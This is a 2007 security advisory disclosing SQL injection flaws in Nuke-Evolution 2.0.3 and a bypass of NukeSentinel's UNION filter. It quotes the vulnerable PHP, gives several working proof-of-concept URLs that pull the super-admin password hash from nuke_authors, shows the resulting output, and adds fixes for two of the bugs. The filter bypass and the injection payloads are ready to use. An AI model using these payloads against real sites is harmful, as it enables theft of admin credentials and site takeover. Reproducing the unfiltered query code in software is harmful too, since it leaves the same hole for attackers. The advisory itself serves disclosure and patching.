NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections

2007-04-20T00:00:00
ID SECURITYVULNS:DOC:16798
Type securityvulns
Reporter Securityvulns
Modified 2007-04-20T00:00:00

Description

PROGRAM: Nuke-Evolution & NukeSentinel HOMEPAGE: http://www.nuke-evolution.com/ VERSION: All versions BUG 1 NukeSentinel Bypass SQL Injection Protection BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities AUTHOR: Aleksandar

NukeSentinel Bypass SQL Injection Protection

nukesentinel.php Line 270-290


// Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'/union/') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'/union/') OR stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } }

// Check for CLIKE attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[2]; if($blocker_row['activate'] > 0) { if ( stristr($nsnst_const['query_string'],'/') OR stristr($nsnst_const['query_string_base64'],'/') OR stristr($nsnst_const['query_string'],'/') OR stristr($nsnst_const['query_string_base64'],'/')) { // block_ip($blocker_row); die("BLOCK IP 2 " ); } }


Example(Bypass SQL Injection Protection):

PHPNuke + NukeSentinel http://localhost/php-nuke/?%2f%2fUNION%2f%2fSELECT ... etc

Nuke-Evolution + NukeSentinel http://localhost/nuke-evolution/?%2f%2fUNION%2f%2fSELECT .. etc

Nuke-Evolution Basic 2.0.3

Open source content management system, which features customizable blocks, modules, multilanguage support and themes. With importance on security, speed and usability. A PHP-Nuke based CMS with added security, functionality, and core improvements.

Site:http://www.nuke-evolution.com/

Your_Account/index.php

Vulnerability code:


case &quot;userinfo&quot;:
    //include&#40;&quot;modules/$module_name/public/userinfo.php&quot;&#41;;

/*[BEGIN]****** [ Mod: YA Merge v1.0.0 ] *******/ //The "$username" variable isn't filtered!!! $result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'<pre><br>"); $uid = $db->sql_fetchrow($result); Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]); die(); /[END]*********** [ Mod: YA Merge v1.0.0 ] *******/ break; *************

POC Exploit: http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f%2fUNION%2f%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f**

Results: MOZILA FIREFOX URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH

MOZILA FIREFOX Live HTTP Headers - Firefox Add-ons

http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate

News/read_article.php line 66

Vulnerability code: ++++++++++++++++++++++++++++++++++ // //The "'$sid" variable isn't filtered!!! $sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

POC Exploit: http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f%2fUNION%2f%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f**

FIX ++++++++++++++++++++++++++++++++++ $sid= intval($sid); // FIX $sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

Donate/index.php line 33 & 46 Vulnerability code:


    if &#40;is_numeric&#40;$uid&#41;&#41; { // LOL :&#41; 
            $uid = intval&#40;$uid&#41;;  :&#41; LOL
    }

.... // Line 46

    } elseif &#40;!empty&#40;$uid&#41;&#41; { 
            include_once&#40;NUKE_BASE_DIR.&#39;header.php&#39;&#41;;
            $sql = &quot;SELECT username FROM &quot;.$user_prefix.&quot;_users where user_id=&#39;$uid&#39;&quot;; // BOOM - &gt; SQL injection 
            $result = $db-&gt;sql_query&#40;$sql&#41;;
            $row = $db-&gt;sql_fetchrow&#40;$result&#41;;
            $name = $row[&#39;username&#39;];

POC Exploit: http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f%2fUNION%2f%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1

FIX

++++++++++++++++++++++++++++++++++++++

    ///if &#40;is_numeric&#40;$uid&#41;&#41; {  REMOVE THIS LINE
            $uid = intval&#40;$uid&#41;; 
    ///} REMOVE THIS LINE

++++++++++++++++++++++++++++++++++++++

Best Regards Aleksandar Programmer and Web Developer